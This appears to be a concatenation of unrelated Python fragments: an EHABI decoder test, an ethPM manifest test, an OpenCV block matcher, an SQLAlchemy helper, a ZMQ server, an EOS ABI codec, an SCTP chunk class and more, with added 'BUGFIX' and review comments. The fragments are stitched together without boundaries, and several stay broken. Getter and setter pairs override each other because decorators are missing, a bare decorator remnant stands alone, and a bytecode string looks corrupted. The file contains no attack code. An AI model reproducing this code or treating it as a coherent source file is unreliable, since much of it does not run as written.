        # Single-register and reserved/spare encodings.
        mnemonic_array = EHABIBytecodeDecoder([216, 208, 202, 201, 0, 200, 0, 199, 16, 199, 1, 199, 0, 198, 0, 192, 184, 180, 179, 0, 178, 0, 177, 16, 177, 1, 177, 0, 176, 168, 160, 159, 157, 145, 136, 0, 128, 0, 64, 0]).mnemonic_array
        self.assertEqual(mnemonic_array[0].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[1].mnemonic, 'pop {d8}')
        self.assertEqual(mnemonic_array[2].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[3].mnemonic, 'pop {d0}')
        self.assertEqual(mnemonic_array[4].mnemonic, 'pop {d16}')
        self.assertEqual(mnemonic_array[5].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[6].mnemonic, 'pop {wCGR0}')
        self.assertEqual(mnemonic_array[7].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[8].mnemonic, 'pop {wR0}')
        self.assertEqual(mnemonic_array[9].mnemonic, 'pop {wR10}')
        self.assertEqual(mnemonic_array[10].mnemonic, 'pop {d8}')
        self.assertEqual(mnemonic_array[11].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[12].mnemonic, 'pop {d0}')
        self.assertEqual(mnemonic_array[13].mnemonic, 'vsp = vsp + 516')
        self.assertEqual(mnemonic_array[14].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[15].mnemonic, 'pop {r0}')
        self.assertEqual(mnemonic_array[16].mnemonic, 'spare')
        self.assertEqual(mnemonic_array[17].mnemonic, 'finish')
        self.assertEqual(mnemonic_array[18].mnemonic, 'pop {r4, lr}')
        self.assertEqual(mnemonic_array[19].mnemonic, 'pop {r4}')
        self.assertEqual(mnemonic_array[20].mnemonic, 'reserved (WiMMX MOVrr)')
        self.assertEqual(mnemonic_array[21].mnemonic, 'reserved (ARM MOVrr)')
        self.assertEqual(mnemonic_array[22].mnemonic, 'vsp = r1')
        self.assertEqual(mnemonic_array[23].mnemonic, 'pop {pc}')
        self.assertEqual(mnemonic_array[24].mnemonic, 'refuse to unwind')
        self.assertEqual(mnemonic_array[25].mnemonic, 'vsp = vsp - 4')
        self.assertEqual(mnemonic_array[26].mnemonic, 'vsp = vsp + 4')
@ui_meta(characters.keine.TeachAction)
class TeachAction():
    """UI metadata for Keine's Teach action.

    BUGFIX: the decorator line had been reduced to a bare
    ``_meta(characters.keine.TeachAction)`` statement; restored the
    ``@ui_meta`` registration so this class is actually attached to the
    game action.

    NOTE(review): the '1' and '!' message strings look like placeholders
    for the original (likely localized) prompt texts — TODO restore the
    real messages from upstream; left byte-identical here.
    """

    def choose_card_text(self, act, cards):
        # Valid selection -> (True, <ok message>), else (False, <error>).
        if act.cond(cards):
            return (True, '')
        else:
            return (False, '')

    def target(self, pl):
        # A target player must be selected for the action to proceed.
        if (not pl):
            return (False, '1')
        return (True, '!')
def test_builder_deployment_type_complex(escrow_package):
    """Build an ethpm/3 manifest using both deployment_type factories and
    plain deployment() entries, then check the deployments section shape."""
    (escrow, w3) = escrow_package
    # Reusable deployment factory pinned to full Escrow metadata
    # (bytecode + compiler info).
    escrow_dep_type = deployment_type(contract_instance='Escrow', contract_type='Escrow', deployment_bytecode={'bytecode': '0xfd5bfddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa3506103dfffffffff7cea7bcddd146100bb872dd146100dbaa9059cbbdd62ed3e1461014a575b600080fd5bfd5b506100a0600160a060020abf35bcfd5b506100c96101d8565bf35befd5b506100a0600160a060020ade565bfd5b506100c9600160a060020ac9565bfd5b506100a0600160a060020ae4565bfd5b506100c9600160a060020ab565ba060020af8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3babbb600160a060020aa060020abb156102bea060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efac2565b5060005bb600160a060020abba060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efad2565bd2565b600160a060020aa165627a7acf9d6a3f751ca1e6b9bc2324e42633a4cde513d64c3e6cc32de'}, runtime_bytecode={'bytecode': '0xffffffff7cea7bcddd146100bb872dd146100dbaa9059cbbdd62ed3e1461014a575b600080fd5bfd5b506100a0600160a060020abf35bcfd5b506100c96101d8565bf35befd5b506100a0600160a060020ade565bfd5b506100c9600160a060020ac9565bfd5b506100a0600160a060020ae4565bfd5b506100c9600160a060020ab565ba060020af8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3babbb600160a060020aa060020abb156102bea060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efac2565b5060005bb600160a060020abba060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efad2565bd2565b600160a060020aa165627a7acf9d6a3f751ca1e6b9bc2324e42633a4cde513d64c3e6cc32de9020029'}, compiler={'name': 'solc', 'version': '0.4.24+commit.e67f0147.Emscripten.clang', 'settings': {'optimize': True}})
    # Minimal factory: only instance/type names, no bytecode metadata.
    safesendlib_dep_type = deployment_type(contract_instance='SafeSendLib', contract_type='SafeSendLib')
    manifest = build(
        {},
        package_name('escrow'),
        version('1.0.0'),
        manifest_version('ethpm/3'),
        # Two entries from the factories...
        escrow_dep_type(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', address=escrow.deployments.get_instance('Escrow').address),
        safesendlib_dep_type(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', address=escrow.deployments.get_instance('SafeSendLib').address),
        # ...and two equivalent entries via the plain deployment() helper.
        deployment(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', contract_instance='Escrow', contract_type='Escrow', address=escrow.deployments.get_instance('Escrow').address),
        deployment(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', contract_instance='SafeSendLib', contract_type='SafeSendLib', address=escrow.deployments.get_instance('SafeSendLib').address),
        validate(),
    )
    # Two block URIs, each holding both contract instances.
    assert (len(manifest['deployments'].keys()) == 2)
    assert (len(list(manifest['deployments'].values())[0]) == 2)
    assert (len(list(manifest['deployments'].values())[1]) == 2)
class StereoBM(BlockMatcher):
    """Block matcher wrapping OpenCV's legacy ``cv2.StereoBM``.

    BUGFIX: the validated attributes had lost their ``@property`` /
    ``@<name>.setter`` decorators (the residue ``_range.setter`` etc. was
    still visible), so validation and ``_replace_bm`` were never invoked on
    assignment. Restored the property pattern.
    """

    # Upper bounds for tunable parameters (None = unbounded).
    parameter_maxima = {'search_range': None, 'window_size': 255, 'stereo_bm_preset': cv2.STEREO_BM_NARROW_PRESET}

    @property
    def search_range(self):
        """Disparity search range (must be a multiple of 16)."""
        return self._search_range

    @search_range.setter
    def search_range(self, value):
        if ((value == 0) or (not (value % 16))):
            self._search_range = value
        else:
            raise InvalidSearchRangeError('Search range must be a multiple of 16.')
        self._replace_bm()

    @property
    def window_size(self):
        """SAD window size (odd, 5..254)."""
        return self._window_size

    @window_size.setter
    def window_size(self, value):
        if ((value > 4) and (value < self.parameter_maxima['window_size']) and (value % 2)):
            self._window_size = value
        else:
            raise InvalidWindowSizeError('Window size must be an odd number between 0 and {}.'.format((self.parameter_maxima['window_size'] + 1)))
        self._replace_bm()

    @property
    def stereo_bm_preset(self):
        """One of the ``cv2.STEREO_BM_*_PRESET`` constants."""
        return self._bm_preset

    @stereo_bm_preset.setter
    def stereo_bm_preset(self, value):
        if (value in (cv2.STEREO_BM_BASIC_PRESET, cv2.STEREO_BM_FISH_EYE_PRESET, cv2.STEREO_BM_NARROW_PRESET)):
            self._bm_preset = value
        else:
            raise InvalidBMPresetError('Stereo BM preset must be defined as cv2.STEREO_BM_*_PRESET.')
        self._replace_bm()

    def _replace_bm(self):
        """Rebuild the underlying cv2.StereoBM with the current parameters."""
        self._block_matcher = cv2.StereoBM(preset=self._bm_preset, ndisparities=self._search_range, SADWindowSize=self._window_size)

    def __init__(self, stereo_bm_preset=cv2.STEREO_BM_BASIC_PRESET, search_range=80, window_size=21, settings=None):
        # Seed the private fields so the validating setters can run.
        self._bm_preset = cv2.STEREO_BM_BASIC_PRESET
        self._search_range = 0
        self._window_size = 5
        self.stereo_bm_preset = stereo_bm_preset
        self.search_range = search_range
        self.window_size = window_size
        super(StereoBM, self).__init__(settings)

    def get_disparity(self, pair):
        """Compute a float32 disparity map from a (left, right) image pair."""
        gray = []
        if (pair[0].ndim == 3):
            # Color input: convert both sides to grayscale first.
            for side in pair:
                gray.append(cv2.cvtColor(side, cv2.COLOR_BGR2GRAY))
        else:
            gray = pair
        return self._block_matcher.compute(gray[0], gray[1], disptype=cv2.CV_32F)
class ReadOnlyDbInterface():
    """Base class for read-only database access via SQLAlchemy sessions.

    BUGFIX: ``get_read_only_session`` is a generator used with ``with``
    blocks, so it must be wrapped in ``@contextmanager`` (the decorator had
    been stripped). Requires ``from contextlib import contextmanager`` at
    module level.
    """

    def __init__(self, connection: (DbConnection | None) = None):
        self.connection = (connection or ReadOnlyConnection())
        # The one currently-open read-only session (None when idle);
        # allows nested calls to share a single session.
        self.ro_session = None

    @contextmanager
    def get_read_only_session(self) -> Session:
        """Context manager yielding a shared read-only session."""
        if self.ro_session is not None:
            # Re-entrant use: nested callers reuse the outer session, which
            # the outermost caller will clean up.
            yield self.ro_session
            return
        self.ro_session: Session = self.connection.session_maker()
        try:
            yield self.ro_session
        except SQLAlchemyError as err:
            message = 'Database error when trying to read from the database'
            logging.exception(f'{message}: {err}')
            raise DbInterfaceError(message) from err
        finally:
            # Always discard the session so no stale state leaks.
            self.ro_session.invalidate()
            self.ro_session = None
class IOServer(Thread):
    """Background thread bridging ZMQ pub/sub sockets to topic handlers.

    Subscribes on ``rx_port``, publishes on ``tx_port``, and optionally logs
    a CSV trace of packet frames to ``log_file``.
    """

    def __init__(self, rx_port=5556, tx_port=5555, log_file=None):
        Thread.__init__(self)
        self.rx_port = rx_port
        self.tx_port = tx_port
        # Event used to request a clean shutdown of run().
        self.__stop = Event()
        self.context = zmq.Context()
        # SUB socket for incoming messages (topic filters added via
        # register_topic).
        self.rx_socket = self.context.socket(zmq.SUB)
        self.rx_socket.connect(('tcp://localhost:%s' % self.rx_port))
        # PUB socket for outgoing messages.
        self.tx_socket = self.context.socket(zmq.PUB)
        self.tx_socket.bind(('tcp://*:%s' % self.tx_port))
        self.poller = zmq.Poller()
        self.poller.register(self.rx_socket, zmq.POLLIN)
        # topic -> handler callable(self, data)
        self.handlers = {}
        self.packet_log = None
        if (log_file is not None):
            self.packet_log = open(log_file, 'wt')
            self.packet_log.write('Direction, Time, Topic, Data\n')

    def register_topic(self, topic, method):
        """Subscribe to *topic* and route its messages to *method*."""
        log.debug(('Registering RX_Port: %s, Topic: %s' % (self.rx_port, topic)))
        self.rx_socket.setsockopt(zmq.SUBSCRIBE, topic.encode('utf-8'))
        self.handlers[topic] = method

    def run(self):
        """Poll for messages and dispatch them until shutdown() is called."""
        while (not self.__stop.is_set()):
            # 1s poll timeout so the stop event is checked regularly.
            socks = dict(self.poller.poll(1000))
            if ((self.rx_socket in socks) and (socks[self.rx_socket] == zmq.POLLIN)):
                msg = self.rx_socket.recv_string()
                log.debug(('Received: %s' % str(msg)))
                (topic, data) = decode_zmq_msg(msg)
                if self.packet_log:
                    self.packet_log.write(('Sent, %i, %s, %s\n' % (time.time(), topic, binascii.hexlify(data['frame']))))
                    self.packet_log.flush()
                # NOTE(review): an unregistered topic would raise KeyError
                # here — presumably only subscribed topics ever arrive.
                method = self.handlers[topic]
                method(self, data)
        log.debug('IO Server Stopped')

    def shutdown(self):
        """Signal run() to exit and close the packet log."""
        log.debug('Stopping Host IO Server')
        self.__stop.set()
        if self.packet_log:
            self.packet_log.close()

    def send_msg(self, topic, data):
        """Encode and publish *data* on *topic*; log frames when enabled."""
        msg = encode_zmq_msg(topic, data)
        self.tx_socket.send_string(msg)
        if self.packet_log:
            if ('frame' in data):
                self.packet_log.write(('Received, %i, %s, %s\n' % (time.time(), topic, binascii.hexlify(data['frame']))))
                self.packet_log.flush()
def sympy_to_grim(expr, **kwargs):
    """Convert a SymPy expression to the equivalent Grim expression.

    Supports integers, symbols, the constants pi/e/i, and Add/Mul/Pow
    (converted recursively). Raises NotImplementedError for anything else.
    """
    import sympy
    assert isinstance(expr, sympy.Expr)
    if expr.is_Integer:
        return Expr(int(expr))
    if expr.is_Symbol:
        return Expr(symbol_name=expr.name)
    if expr is sympy.pi:
        return Pi
    if expr is sympy.E:
        return ConstE
    if expr is sympy.I:
        return ConstI
    if expr.is_Add:
        args = [sympy_to_grim(x, **kwargs) for x in expr.args]
        return Add(*args)
    if expr.is_Mul:
        args = [sympy_to_grim(x, **kwargs) for x in expr.args]
        return Mul(*args)
    if expr.is_Pow:
        args = [sympy_to_grim(x, **kwargs) for x in expr.args]
        (b, e) = args
        return Pow(b, e)
    # BUGFIX: the message was passed as two positional arguments, so '%s'
    # was never interpolated; format it explicitly.
    raise NotImplementedError('converting %s to Grim' % type(expr))
@dataclass(frozen=True)
class TableModelDescr():
    """Immutable descriptor for a named table model on disk.

    BUGFIX: the class decorator had been reduced to a bare ``(frozen=True)``
    (a syntax error). Restored a frozen dataclass — NOTE(review): confirm
    against upstream whether this was ``dataclass`` or an attrs define;
    both fit the annotated-field style seen here.
    """
    name: str

    @property
    def path(self):
        """Resolved .glb path for this model (PBR variant if enabled)."""
        if ani.settings['graphics']['physical_based_rendering']:
            path = (((ani.model_dir / 'table') / self.name) / (self.name + '_pbr.glb'))
        else:
            path = (((ani.model_dir / 'table') / self.name) / (self.name + '.glb'))
        if (not path.exists()):
            raise ConfigError(f"Couldn't find table model with name: {self.name}")
        return panda_path(path)

    @staticmethod
    def null() -> TableModelDescr:
        """Sentinel descriptor meaning 'no model'."""
        return TableModelDescr(name='null')
def create_privacy_request(user_email: str, policy_key: str):
    """Create a fidesops privacy request for *user_email* under *policy_key*.

    Returns the API response JSON on success; raises RuntimeError when the
    request fails or no privacy request was created.
    """
    privacy_request_data = [{'requested_at': str(datetime.utcnow()), 'policy_key': policy_key, 'identity': {'email': user_email}}]
    url = f'{FIDESOPS_V1_API_URL}{ops_urls.PRIVACY_REQUESTS}'
    response = requests.post(url, json=privacy_request_data)
    if response.ok:
        created_privacy_requests = response.json()['succeeded']
        if (len(created_privacy_requests) > 0):
            # BUGFIX: previously interpolated the undefined name `email`
            # (NameError); the parameter is `user_email`.
            logger.info(f'Created fidesops privacy request for email={user_email} via {url}')
            return response.json()
    raise RuntimeError(f'fidesops privacy request creation failed! response.status_code={response.status_code}, response.json()={response.json()}')
def test_download_and_copy_copy_failure(mock_dependencies):
    """A copy_expert failure must propagate out of the download/copy generator."""
    mock_dependencies.copy_expert.side_effect = Exception('DB Error')
    step = _download_and_copy(
        logger,
        mock_dependencies,
        Mock(),
        DUMMY_BUCKET,
        DUMMY_KEY,
        DUMMY_TABLE,
        DUMMY_COLS,
        gzipped=True,
    )
    with pytest.raises(Exception, match='DB Error'):
        next(step)
def is_equal(left, right):
    """None-safe equality check.

    Returns True when both sides are None or when both are non-None and
    compare equal; False when exactly one side is None or the values differ.
    (Simplified from a four-branch if/elif chain.)
    """
    if left is None or right is None:
        # At least one side is None: equal only if both are.
        return left is right
    return left == right
def test_compile_solc_object(project, solc5source):
    """compile_source must yield a TempProject containing both contracts."""
    compiled = project.compile_source(solc5source)
    assert type(compiled) is TempProject
    assert isinstance(compiled, _ProjectBase)
    assert len(compiled) == 2
    assert compiled._name == 'TempSolcProject'
    for contract_name in ('Foo', 'Bar'):
        assert contract_name in compiled
class EOSBuffer():
    """Encoder/decoder between EOS ABI types and hex-string buffers.

    Values travel as hex strings (two hex chars per byte); decode() consumes
    from the front of the buffer and returns (value, leftover).

    NOTE(review): references to ``long`` imply Python 2 (or a module-level
    alias) — confirm the supported interpreter before modernizing.
    """

    def __init__(self, v):
        # The raw value (or hex buffer) this instance wraps.
        self._value = v
        self._count = 0

    def _decode_number(self, val, format='L'):
        """Decode a big-endian hex string using a struct format code."""
        byte_val = binascii.unhexlify(val)
        return convert_big_endian(byte_val, format)

    def _decode_float(self, val, format='f'):
        """Decode a big-endian hex-encoded float."""
        byte_val = binascii.unhexlify(val)
        return struct.unpack('>{}'.format(format), byte_val)

    def _decode_name(self, val, format='Q'):
        """Decode a hex string into an EOS name string."""
        num = self._decode_number(val, format)
        return name_to_string(num)

    def _decode_str(self, val):
        """Decode a varuint-length-prefixed string; returns (str, leftover)."""
        vu = VarUInt()
        (length, val) = vu.decode(val)
        string = ''
        leftover = val
        if (length > 0):
            # length is in bytes; the hex representation is twice as long.
            (str_data, leftover) = self._splice_buf(val, (length * 2))
            string = binascii.unhexlify(str_data).decode()
        return (string, leftover)

    def _splice_buf(self, buf, length):
        """Split *buf* into (head of *length* chars, remainder)."""
        return (buf[:length], buf[length:])

    def _write_number(self, val, format='q'):
        """Encode a number little-endian and return it as a hex string."""
        le = convert_little_endian(val, format)
        return binascii.hexlify(le).decode()

    def _write_name(self, w_str):
        """Encode an EOS name string as a little-endian uint64 hex string."""
        val = string_to_name(w_str)
        le = convert_little_endian(val, 'Q')
        return binascii.hexlify(le).decode()

    def _write_str(self, w_str):
        """Encode a string as varuint length prefix + bytes, hex-encoded."""
        b = bytearray()
        length = VarUInt(len(w_str)).encode()
        b.extend(map(ord, w_str))
        return binascii.hexlify((length + b)).decode()

    def _write_varuint(self, vuint):
        """Encode a VarUInt instance as a hex string."""
        buf = vuint.encode()
        return binascii.hexlify(buf).decode()

    def decode(self, objType, buf=None):
        """Decode one value of *objType*'s type from *buf* (or self._value).

        Dispatches on the runtime type of *objType*; returns (value,
        leftover-hex). Raises EOSBufferInvalidType for unsupported types.
        """
        leftover = ''
        if (not buf):
            buf = self._value
        if isinstance(objType, UInt32):
            (val, leftover) = self._splice_buf(buf, objType.hex_str_len)
            val = self._decode_number(val, 'I')
        elif isinstance(objType, UInt16):
            (val, leftover) = self._splice_buf(buf, objType.hex_str_len)
            val = self._decode_number(val, 'H')
        elif isinstance(objType, VarUInt):
            (val, leftover) = objType.decode(buf)
        elif (isinstance(objType, Byte) or isinstance(objType, bool)):
            # Single byte == two hex characters.
            (hex_str, leftover) = self._splice_buf(buf, 2)
            val = hex_to_int(hex_str)
        elif isinstance(objType, Float):
            (val, leftover) = self._splice_buf(buf, objType.hex_str_len)
            val = self._decode_float(val, 'f')
        elif (isinstance(objType, int) or isinstance(objType, long)):
            (val, leftover) = self._splice_buf(buf, objType.hex_str_len)
            val = self._decode_number(val, 'q')
        elif (isinstance(objType, Name) or isinstance(objType, AccountName) or isinstance(objType, PermissionName) or isinstance(objType, ActionName) or isinstance(objType, TableName) or isinstance(objType, ScopeName)):
            (val, leftover) = self._splice_buf(buf, objType.hex_str_len)
            val = self._decode_name(val)
        elif isinstance(objType, str):
            (val, leftover) = self._decode_str(buf)
        elif isinstance(objType, list):
            # Lists are varuint-count-prefixed; the first element of
            # objType serves as the element-type template.
            val = []
            (length, leftover) = VarUInt('').decode(buf)
            while (len(val) < length):
                (out, leftover) = self.decode(objType[0], leftover)
                val.append(out)
        else:
            raise EOSBufferInvalidType('Cannot decode type: {}'.format(type(objType)))
        return (val, leftover)

    def encode(self, val=None):
        """Encode *val* (or self._value) into its hex-string form.

        Dispatches on the runtime type of *val*; ABI container objects
        delegate to their own encode(). Raises EOSBufferInvalidType for
        unsupported types.
        """
        if (not val):
            val = self._value
        if (isinstance(val, Name) or isinstance(val, AccountName) or isinstance(val, PermissionName) or isinstance(val, ActionName) or isinstance(val, TableName) or isinstance(val, ScopeName)):
            val = self._write_name(val)
            return val
        elif isinstance(val, str):
            return self._write_str(val)
        elif (isinstance(val, Byte) or isinstance(val, bool)):
            return int_to_hex(val)
        elif isinstance(val, UInt16):
            return self._write_number(val, 'H')
        elif isinstance(val, UInt32):
            return self._write_number(val, 'I')
        elif isinstance(val, UInt64):
            return self._write_number(val, 'q')
        elif isinstance(val, Float):
            return self._write_number(val, 'f')
        elif isinstance(val, VarUInt):
            return self._write_varuint(val)
        elif (isinstance(val, int) or isinstance(val, long)):
            return self._write_number(val, 'l')
        elif (isinstance(val, Action) or isinstance(val, AbiStruct) or isinstance(val, AbiStructField) or isinstance(val, AbiType) or isinstance(val, AbiAction) or isinstance(val, AbiTable) or isinstance(val, AbiRicardianClauses) or isinstance(val, AbiErrorMessages) or isinstance(val, AbiExtensions) or isinstance(val, AbiVariants) or isinstance(val, Asset) or isinstance(val, Authorization)):
            # Composite ABI objects know how to encode themselves.
            return val.encode()
        elif isinstance(val, list):
            # varuint element count followed by each encoded element.
            buf = self._write_varuint(VarUInt(len(val)))
            for item in val:
                e_item = self.encode(item)
                buf = '{}{}'.format(buf, e_item)
            return buf
        else:
            raise EOSBufferInvalidType('Cannot encode type: {}'.format(type(val)))
def test_that_fetching_unknown_parameter_fails():
    """import_roff must raise ValueError for a parameter absent from the file."""
    content = dedent('roff-asc\n #ROFF file#\n #Creator: Ert#\n tag dimensions\n int nX 1\n int nY 1\n int nZ 1\n endtag\n tag parameter\n char name "parameter"\n array float data 1\n 0.0\n endtag\n tag eof\n endtag\n ')
    expected_message = "Could not find roff parameter 'does_not_exist' in"
    with pytest.raises(ValueError, match=expected_message):
        import_roff(StringIO(content), 'does_not_exist')
def extractWwwCntranslationsCom(item):
    """Parse a cntranslations.com release title into a release message.

    Returns None for previews/unparseable titles, False when no known
    group tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag to look for, release group name, translation type)
    mappings = (
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    )
    for tag, group_name, release_type in mappings:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, group_name, vol, chp, frag=frag, postfix=postfix, tl_type=release_type)
    return False
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
    """Integration test: hot-reconfigure one output-only port to mirror two access ports."""

    # One untagged VLAN shared by the two access ports.
    CONFIG_GLOBAL = '\nvlans:\n 100:\n description: "untagged"\n'
    # Ports 1/2 carry traffic; ports 3/4 start as output-only (mirror candidates).
    CONFIG = '\n interfaces:\n %(port_1)d:\n native_vlan: 100\n %(port_2)d:\n native_vlan: 100\n %(port_3)d:\n output_only: True\n %(port_4)d:\n output_only: True\n'

    def test_untagged(self):
        """Set port 3 to mirror ports 1 and 2 via a warm config change, then verify mirroring."""
        (first_host, second_host, mirror_host) = self.hosts_name_ordered()[:3]
        # Ping in both directions so traffic from each mirrored port is exercised.
        ping_pairs = ((first_host, second_host), (second_host, first_host))
        self.flap_all_switch_ports()
        # Warm reconfig (hup, no cold start): port 3 becomes a mirror of ports 1 and 2.
        self.change_port_config(self.port_map['port_3'], 'mirror', [self.port_map['port_1'], self.port_map['port_2']], restart=True, cold_start=False, hup=True)
        # both_mirrored=True — presumably both directions of each pair must show
        # up on the mirror port; TODO confirm against verify_ping_mirrored_multi.
        self.verify_ping_mirrored_multi(ping_pairs, mirror_host, both_mirrored=True)
def mutual_friends(*args):
    """Return the friends common to every given Bot or Chats, as a Chats.

    Each argument is either a Bot (its full friend list is used) or a Chats
    collection.  Friends are compared fuzzily — by nick name, sex, province,
    city and raw ``AttrStatus`` — rather than by session-specific ids, so the
    same person seen from two accounts matches.

    Raises:
        TypeError: if an argument is neither a Bot nor a Chats.
    """
    from ..api.bot import Bot
    from ..api.chats import Chats, User

    class FuzzyUser(User):
        # Wraps a User so hashing ignores per-session identifiers.
        # NOTE(review): __hash__ is overridden but __eq__ is inherited —
        # presumably User.__eq__ already compares compatible fields; confirm.
        def __init__(self, user):
            super(FuzzyUser, self).__init__(user.raw, user.bot)

        def __hash__(self):
            return hash((self.nick_name, self.sex, self.province, self.city, self.raw['AttrStatus']))

    mutual = set()
    initialized = False  # distinguishes "no source processed yet" from an empty intersection
    for arg in args:
        if isinstance(arg, Bot):
            friends = map(FuzzyUser, arg.friends())
        elif isinstance(arg, Chats):
            friends = map(FuzzyUser, arg)
        else:
            raise TypeError
        if initialized:
            mutual &= set(friends)
        else:
            # Bug fix: the previous `if mutual:` test treated an empty set as
            # "not yet initialized", so an empty first friend list (or an
            # intersection that became empty) caused later sources to be
            # unioned in instead of keeping the intersection empty.
            mutual.update(friends)
            initialized = True
    return Chats(mutual)
def test_mask_with_multi_value():
    """Masking several values yields a fixed-length random string for each."""
    privacy_request_id = '123432'
    strategy = RandomStringRewriteMaskingStrategy(configuration=RandomStringMaskingConfiguration(length=6))
    results = strategy.mask(['string to mask', 'another string'], privacy_request_id)
    assert len(results[0]) == 6
    assert len(results[1]) == 6
def test_instantiated_regular_class_container_types_object2(instantiate_func: Any) -> None:
    """With ConvertMode.OBJECT, dict leaves stay dicts while structured configs become objects."""
    config = {'_target_': 'tests.instantiate.SimpleClass', 'a': [{}, User(name='Bond', age=7)], 'b': None}
    instance = instantiate_func(config, _convert_=ConvertMode.OBJECT)
    assert isinstance(instance.a, list)
    assert isinstance(instance.a[0], dict)
    assert isinstance(instance.a[1], User)
class OptionPlotoptionsPictorialSonificationContexttracksMappingPan(Options):
    """Highcharts `plotOptions.pictorial.sonification.contextTracks.mapping.pan` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def mapFunction(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class IndexManagerMixin():
    """Shared test cases for index-manager implementations.

    Concrete TestCase subclasses must provide ``self.index_manager``; these
    tests exercise the Root sentinel plus round-trips between index objects,
    (parent, row) pairs, flat sequences and opaque ids.
    """

    def test_root_has_no_parent(self):
        """Root is the top of the hierarchy — asking for its parent raises."""
        with self.assertRaises(IndexError):
            self.index_manager.get_parent_and_row(Root)

    def test_root_to_sequence(self):
        """Root maps to the empty sequence."""
        result = self.index_manager.to_sequence(Root)
        self.assertEqual(result, ())

    def test_root_from_sequence(self):
        """The empty sequence maps back to the Root singleton."""
        result = self.index_manager.from_sequence([])
        self.assertIs(result, Root)

    def test_root_id_round_trip(self):
        """id()/from_id() preserve Root identity."""
        root_id = self.index_manager.id(Root)
        result = self.index_manager.from_id(root_id)
        self.assertIs(result, Root)

    def test_simple_sequence_round_trip(self):
        """A one-element sequence survives from_sequence/to_sequence."""
        sequence = (5,)
        index = self.index_manager.from_sequence(sequence)
        result = self.index_manager.to_sequence(index)
        self.assertEqual(result, sequence)

    def test_simple_sequence_invalid(self):
        """Negative rows are rejected."""
        sequence = ((- 5),)
        with self.assertRaises(IndexError):
            self.index_manager.from_sequence(sequence)

    def test_simple_sequence_to_parent_row(self):
        """A depth-1 sequence resolves to (Root, row)."""
        sequence = (5,)
        index = self.index_manager.from_sequence(sequence)
        result = self.index_manager.get_parent_and_row(index)
        self.assertEqual(result, (Root, 5))

    def test_simple_row_round_trip(self):
        """create_index/get_parent_and_row are inverses for a direct child of Root."""
        index = self.index_manager.create_index(Root, 5)
        result = self.index_manager.get_parent_and_row(index)
        self.assertEqual(result, (Root, 5))

    def test_simple_row_invalid(self):
        """create_index rejects negative rows."""
        with self.assertRaises(IndexError):
            self.index_manager.create_index(Root, (- 5))

    def test_simple_row_to_sequence(self):
        """A created index flattens back to its row sequence."""
        index = self.index_manager.create_index(Root, 5)
        result = self.index_manager.to_sequence(index)
        self.assertEqual(result, (5,))

    def test_simple_id_round_trip(self):
        """id()/from_id() preserve a non-root index."""
        index = self.index_manager.create_index(Root, 5)
        # NOTE: local name shadows the builtin `id`; harmless within the test.
        id = self.index_manager.id(index)
        result = self.index_manager.from_id(id)
        self.assertEqual(result, index)
# NOTE(review): the bare `_chunk_type` below looks like the remnant of a
# stripped registration decorator (e.g. `@chunk.register_chunk_type`);
# as written it is a no-op name lookup — restore the decorator when merging.
_chunk_type
class chunk_shutdown(chunk):
    """SCTP SHUTDOWN chunk: fixed header of type, flags, length and cumulative TSN ack."""

    # type(1B) / flags(1B) / length(2B) / cumulative TSN ack(4B), network order.
    _PACK_STR = '!BBHI'
    _MIN_LEN = struct.calcsize(_PACK_STR)

    def chunk_type(cls):
        # NOTE(review): takes `cls` and is also called on instances —
        # the @classmethod decorator appears to have been stripped.
        return TYPE_SHUTDOWN

    def __init__(self, flags=0, length=0, tsn_ack=0):
        # length==0 means "compute at serialize time" (see serialize()).
        super(chunk_shutdown, self).__init__(self.chunk_type(), length)
        self.flags = flags
        self.tsn_ack = tsn_ack

    def parser(cls, buf):
        # NOTE(review): likely a stripped @classmethod as well.
        # Unpack the fixed header; the leading type byte is discarded.
        (_, flags, length, tsn_ack) = struct.unpack_from(cls._PACK_STR, buf)
        msg = cls(flags, length, tsn_ack)
        return msg

    def serialize(self):
        """Pack the chunk; defaults length to the minimum header size when unset."""
        if (0 == self.length):
            self.length = self._MIN_LEN
        buf = struct.pack(self._PACK_STR, self.chunk_type(), self.flags, self.length, self.tsn_ack)
        return buf
def configure_logger(verbose: bool, format_: str) -> None:
    """(Re)install the stderr log sink according to verbosity and output format.

    'porcelain' suppresses everything below CRITICAL for machine-readable
    output; 'no-color' disables colorization; any other format gets colored
    output.  Verbose lowers the threshold from INFO to DEBUG.
    """
    logger.remove()
    if format_ == 'porcelain':
        logger.add(sys.stderr, level='CRITICAL')
        return
